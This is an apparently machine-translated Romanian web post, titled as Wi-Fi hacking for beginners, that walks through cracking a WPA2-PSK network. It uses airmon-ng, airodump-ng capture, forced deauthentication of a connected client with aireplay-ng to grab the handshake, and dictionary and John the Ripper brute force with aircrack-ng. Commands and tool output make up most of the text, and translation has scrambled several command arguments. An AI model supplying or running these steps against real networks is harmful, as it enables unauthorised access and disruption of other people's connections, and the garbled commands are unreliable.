Hacking wi-fi pentru incepatori

Hacking wi-fi pentru incepatori.

Hacking wi-fi pentru incepatori.

Cum de a ocoli protecția punctelor și de a genera hashes pentru ruperea WPA cu airolib-ng

Re: Hacking wi-fi pentru incepatori.







Addvlene через 23 ore 41 minute
hacking WPA.


Voi folosi Dlink DWL-G122 (USB), o interfață de rețea fără fir pentru această procedură. În backtrack4, acest dispozitiv este recunoscut ca wlan0.

Mai întâi, puneți cardul în modul de monitorizare:

Driver driver chipset

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (părinte: wifi0)
ath1 Atheros madwifi-ng VAP (părinte: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]

# airmon-ng începe wlan0

Driver driver chipset

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (părinte: wifi0)
ath1 Atheros madwifi-ng VAP (părinte: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(modul de monitorizare activat pe mon0)
.

Ok, acum putem folosi interfața mon0

Să găsim o rețea fără fir care utilizează WPA2 / PSK

BSSID PWR balize # Date, # / s CH MB ENC CIPHER AUTH ESSID

00: 19: 5B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

Stația BSSID STATION PWR Rate Lost Packets Probe

00: 19: 5B: 52: AD: F7 00: 1C: BF: 90: 5B: A3 -29 12 ianuarie cu 4 0- TestNet

Opriți airodump-ng (ctrl + c) și rulați-l din nou, pentru a scrie toate pachetele pe disc

airodump-ng mon0 --channel --bssid 10 00: 19: 5B: 52: AD: F7 -w / tmp / WPA2








În acest moment, aveți două opțiuni: fie așteptați pentru client să se conecteze și 4-strângere de mână este completă, sau deauthenticate clienții existenți și de a face, astfel, AP reassociate. Timpul este bani, așa că să forțăm să ne autentificăm. Noi trebuie să înceapă prin tastarea aireplay-ng BSSID AP (e) și MAC a clientului conectat (c)

# Aireplay-ng -0 -a 1 00: 19: 5B: 52: AD: F7 -c 00: 1C: BF: 90: 5B: A3 mon0

13:04:19 Așteptarea cadrului de baliză (BSSID: 00: 19: 5B: 52: AD: F7) pe canalul 10

13:04:20 Trimiterea a 64 de direcții DeAuth. STMAC: [00: 1C: BF: 90: 5B: A3] [67 | 66 ACK]

Ca rezultat, airodump-ng va indica "WPA Handshake:" în colțul din dreapta sus

BSSID PWR RXQ balize #Data, # / s CH MB ENC CIPHER AUTH ESSID

00: 19: 5B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

Stația BSSID STATION PWR Rate Lost Packets Probe

00: 19: 5B: 52: AD: F7: 1C: BF: 90: 5B: A3-27 54-54 0 230


Opriți airodump-ng și asigurați-vă că fișierele au fost create corect

rădăcină @ bt: / # ls / tmp / wpa2 * -al

Există 2 moduri bruteforcing: una care este relativ rapid, dar nu garantează succesul, și unul care este foarte lent, dar se asigură că veți găsi cheia după o anumită perioadă de timp.

Prima opțiune este utilizarea fișierului de lucrări / dicționar. Multe dintre aceste fișiere pot fi găsite pe Internet sau pot fi obținute cu instrumente cum ar fi John Ripper. După crearea listei de cuvinte, tot ce trebuie să faceți este să executați Aircrack-ng prin introducerea fișierului cu Handshake și dicționarul word.txt

aircrack-ng -w /tmp/wordlists/word.lst -b 00: 19: 5B: 52: AD: F7 /tmp/wpa2*.cap

A doua metodă (bruteforcing) va fi de succes sigur, dar poate dura o lungă perioadă de timp. pentru a termina. Rețineți, cheia WPA2 poate fi de până la 64 de caractere, astfel încât, în teorie, este de a construi toate combinațiile de parole, cu toate seturile de caractere și să le hrănească în Aircrack ia mult timp. Dacă doriți să utilizați John Spintecatorul pentru a crea toate combinațiile posibile de parole și de a le alimenta în Aircrack-NG, este comanda de utilizare:

# / pentest / parola / jtr / john --stdout --incremental: toate aircrack-ng -b 00: 19: 5B: 52: AD: F7 -w - /tmp/wpa2*.cap







Articole similare

Trimiteți-le prietenilor: